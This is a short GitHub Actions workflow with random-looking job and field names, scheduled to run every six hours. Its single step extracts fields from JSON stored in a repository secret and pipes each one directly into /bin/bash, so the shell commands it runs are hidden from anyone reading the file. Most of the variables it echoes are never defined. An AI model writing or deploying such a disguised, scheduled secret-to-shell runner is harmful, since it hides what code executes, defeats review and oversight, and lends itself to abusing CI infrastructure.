name: fretfulpresident
on:
  workflow_dispatch:
  schedule:
    - cron: '42 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fretfulpresident
        env:
          cat1: ${{ secrets.cat1 }}
        run: |
          echo $cat1 | jq -r .wwnte0 | /bin/bash
          echo $zg0834 | jq -r .n17944 | /bin/bash
          echo $dxtx6 | jq -r .yirq22 | /bin/bash
          echo $bf7 | jq -r .wuj6572 | /bin/bash
          echo $j2 | jq -r .dzqg163 | /bin/bash
          echo $njghf246 | jq -r .cr22 | /bin/bash
          echo $mhpe83774 | jq -r .qx7 | /bin/bash

